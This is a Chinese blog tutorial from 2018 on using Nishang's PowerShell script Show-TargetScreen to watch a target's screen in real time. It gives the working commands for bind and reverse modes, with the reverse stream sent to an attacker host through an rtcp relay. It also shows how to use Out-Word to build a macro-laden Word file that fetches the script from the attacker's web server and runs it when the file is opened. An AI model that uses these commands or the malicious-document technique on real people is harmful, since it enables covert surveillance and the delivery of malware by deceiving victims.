使用Powershell對目標進行螢幕監控

FLy_鵬程萬里發表於2018-05-24

0x00前言

Nishang是基於PowerShell的滲透測試專用工具。整合了框架、指令碼和各種payload。這些指令碼是由Nishang的作者在真實滲透測試過程中有感而發編寫的,具有實戰價值。包括了下載和執行、鍵盤記錄、dns、延時命令等指令碼。今天要給大家介紹的是如何通過powershell對目標的螢幕進行實時監控。

指令碼下載地址如下:

https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Show-TargetScreen.ps1

使用也很簡單,指令碼包括了reverse以及bind模式。下面是使用示例:

0x01 Bind模式:

PS C:\Users\evi1cg\Desktop> . .\Show-TargetScreen.ps1
PS C:\Users\evi1cg\Desktop> Show-TargetScreen -Bind -Port 3333

然後在自己的計算機上使用火狐訪問目標3333埠,結果如下圖:


0x02Reverse模式

attacker:
在這裡可以使用創宇的py指令碼轉發:
https://github.com/knownsec/rtcp
執行:
rtcp [master]            python rtcp.py l:5555 l:4444                 
監聽本地5555埠以及4444埠。
之後在target執行:
PS C:\Users\evi1cg\Desktop> . .\Show-TargetScreen.ps1
PS C:\Users\evi1cg\Desktop> Show-TargetScreen -Reverse-IPAddress 192.168.74.1 -Port 5555
效果截圖:


0x03 使用Powershell Client

Out-Word.ps1作為演示示例:

生成word檔案:

PS C:\Users\evi1cg\Desktop> . .\Out-Word.ps1
PS C:\Users\evi1cg\Desktop> Out-Word -PayloadURL"http://192.168.74.1/Show-TargetScreen.ps1" -Arguments"Show-TargetScreen 
   -Reverse -IPAddress 192.168.74.1 -Port 6666"

之後將Show-TargetScreen.ps1放在我們的web根目錄:
測試:


開啟監聽:

rtcp [master]     python rtcp.py l:6666 l:4444

當執行開啟office巨集的word時,我們就可對其螢幕進行監控,如下圖:


相關文章